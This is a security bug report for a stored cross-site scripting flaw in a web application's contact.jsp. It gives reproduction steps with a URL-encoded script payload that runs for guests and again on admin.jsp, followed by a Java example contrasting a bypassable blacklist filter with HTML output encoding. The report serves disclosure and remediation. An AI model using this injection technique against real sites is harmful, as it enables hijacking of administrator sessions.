It is possible to run an XSS attack through the contact.jsp servlet that allows attackers to run arbitrary JavaScript code on the contact.jsp page itself and on admin.jsp.
Go to contact.jsp as guest user
Switch on network traffic recording (through your browser or proxy)
Click the submit button
Change both the null and comments fields to %3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E (e.g. null=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E&anticsrf=0.33839068496777436&comments=%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E).
Login as admin user
Two pop-up boxes with the text hello should be displayed
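
Added example (not the application's code): the usual fix for the behaviour reproduced above is to HTML-encode the submitted value at the point where contact.jsp and admin.jsp write it into the page. The class and method names are assumptions, and naiveFilter is a hypothetical case-sensitive blacklist included only to contrast with encoding.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

public class CommentEncodingDemo {

    // Hypothetical blacklist filter (an assumption, not taken from the application):
    // it removes only the exact lowercase tags, so mixed-case tags pass through.
    static String naiveFilter(String input) {
        return input.replace("<script>", "").replace("</script>", "");
    }

    // Output encoding for HTML element content and quoted attribute values:
    // every markup-significant character is replaced by an entity.
    static String encodeForHtml(String input) {
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Form value from the reproduction steps, decoded as a servlet container would.
        String raw = "%3CScript%3Ealert%28%27hello%27%29%3B%3C%2FScript%3E";
        String comments = URLDecoder.decode(raw, StandardCharsets.UTF_8);

        String filtered = naiveFilter(comments);
        String encoded = encodeForHtml(comments);

        System.out.println("decoded : " + comments);
        System.out.println("filtered: " + filtered);
        System.out.println("encoded : " + encoded);

        // The blacklist leaves the markup untouched; encoding leaves no raw angle brackets.
        if (!filtered.equals(comments)) throw new AssertionError("filter changed the input");
        if (encoded.indexOf('<') >= 0 || encoded.indexOf('>') >= 0)
            throw new AssertionError("raw markup survived encoding");
    }
}
```

Encoding has to be applied on output in both pages, since the value is rendered to the guest on contact.jsp and again to the administrator on admin.jsp.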